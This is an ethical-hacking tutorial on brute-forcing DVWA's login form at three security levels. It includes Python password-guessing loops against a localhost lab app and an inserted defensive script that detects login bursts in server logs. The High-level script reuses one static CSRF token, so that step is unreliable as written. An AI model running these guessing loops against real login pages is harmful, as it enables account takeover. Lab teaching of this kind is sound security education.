BRUTE FORCE - DVWA (Low/Medium/High)
Introduction
This tutorial walks you through the process of performing brute force attacks on DVWA (Damn Vulnerable Web Application) at different security levels: Low, Medium, and High. Each level introduces specific protections that alter how brute force attacks can be executed. Understanding these methods is crucial for ethical hacking and web security practice.
Step 1: Setting Up DVWA
- Install DVWA:
  - Download DVWA from the official GitHub repository.
  - Set it up on a local server such as XAMPP or MAMP.
- Configure DVWA:
  - Open the DVWA config file located in the config directory.
  - Set the database details to match your local setup.
  - Ensure that the database is created in MySQL.
- Access DVWA:
  - Open your web browser and navigate to the DVWA URL (usually http://localhost/dvwa).
  - Log in using the default credentials (admin/password).
Step 2: Brute Forcing at Low Security Level
- Select Low Security:
  - In the DVWA interface, navigate to the "DVWA Security" section.
  - Set the security level to "Low".
- Identify the Login Form:
  - Go to the login page where you will perform the brute force attack.
- Perform the Brute Force Attack:
  - Use a tool like Burp Suite or a simple script to send multiple login attempts.
  - Common tools/scripts can be found online, or you can write a Python script:

    import requests

    url = "http://localhost/dvwa/vulnerabilities/brute/"
    usernames = ["admin"]
    passwords = ["password1", "password2", "password3"]

    # Try each candidate password until the response contains the success marker
    for password in passwords:
        response = requests.post(url, data={'username': usernames[0], 'password': password})
        if "Welcome" in response.text:
            print(f"Password found: {password}")
            break
Step 3: Brute Forcing at Medium Security Level
- Select Medium Security:
  - Set the security level to "Medium" in the DVWA settings.
- Understand the Changes:
  - The Medium level introduces a delay after each login attempt to slow down brute force attacks.
- Modify Your Attack:
  - Adjust your script or tool to accommodate the timing delay.
  - You may need to implement a sleep function in your script:

    import time

    # Reuses requests, url, usernames and passwords from the Low-level script
    for password in passwords:
        response = requests.post(url, data={'username': usernames[0], 'password': password})
        time.sleep(2)  # introduce a delay
        if "Welcome" in response.text:
            print(f"Password found: {password}")
            break
Step 4: Brute Forcing at High Security Level
- Select High Security:
  - Set the security level to "High" in the DVWA settings.
- Learn About CSRF Tokens:
  - The High level adds CSRF tokens to the form, which must be included in the request.
- Capture the CSRF Token:
  - Use Burp Suite or inspect element in your browser to find the token in the login form.
- Modify Your Attack for CSRF:
  - Update your script to include the CSRF token in the post request:

    # Reuses requests, url, usernames and passwords from the Low-level script
    csrf_token = "your_captured_token"

    for password in passwords:
        response = requests.post(url, data={'username': usernames[0], 'password': password, 'csrf_token': csrf_token})
        if "Welcome" in response.text:
            print(f"Password found: {password}")
            break
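Seen from the defender's side, the attempts made at any of the three levels appear in the web server log as a burst of requests to the same login path. The following is an added example, not part of the original tutorial: it counts requests per source IP in a sliding window over constructed log lines. The log format, the threshold values and the name detect_bruteforce are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/dvwa/vulnerabilities/brute/"  # path used by the tutorial's script

# Constructed sample access-log lines (assumed Apache-style format), not real traffic.
# 198.51.100.7 sends six attempts two seconds apart; 192.0.2.10 sends two, minutes apart.
SAMPLE_LOG = "\n".join(
    [f'198.51.100.7 - - [12/Mar/2024:10:00:{s:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 4300'
     for s in range(0, 12, 2)]
    + [f'192.0.2.10 - - [12/Mar/2024:10:0{m}:03 +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 4300'
       for m in (0, 5)]
)

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<path>\S+)')


def detect_bruteforce(log_text, max_attempts=5, window=timedelta(seconds=60)):
    """Return {ip: time the threshold was first exceeded} for login-path requests."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the sliding window
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["path"].split("?", 1)[0] != LOGIN_PATH:
            continue  # unparsable line or a request to another page
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        attempts = recent[m["ip"]]
        attempts.append(ts)
        while ts - attempts[0] > window:  # drop attempts older than the window
            attempts.popleft()
        if len(attempts) > max_attempts:
            flagged.setdefault(m["ip"], ts)
    return flagged


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}, threshold exceeded at {when}")
```

The constructed attempts are spaced two seconds apart, like the delay in the Medium-level script, and still exceed the threshold within the window.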
Conclusion
In this tutorial, you learned how to execute brute force attacks on DVWA at different security levels. Each level introduces unique challenges, from simple login forms to delays and CSRF protection. Always remember to use these techniques ethically and responsibly, focusing on improving security practices rather than exploiting vulnerabilities. Next steps could involve exploring further security measures or delving into other aspects of web application security.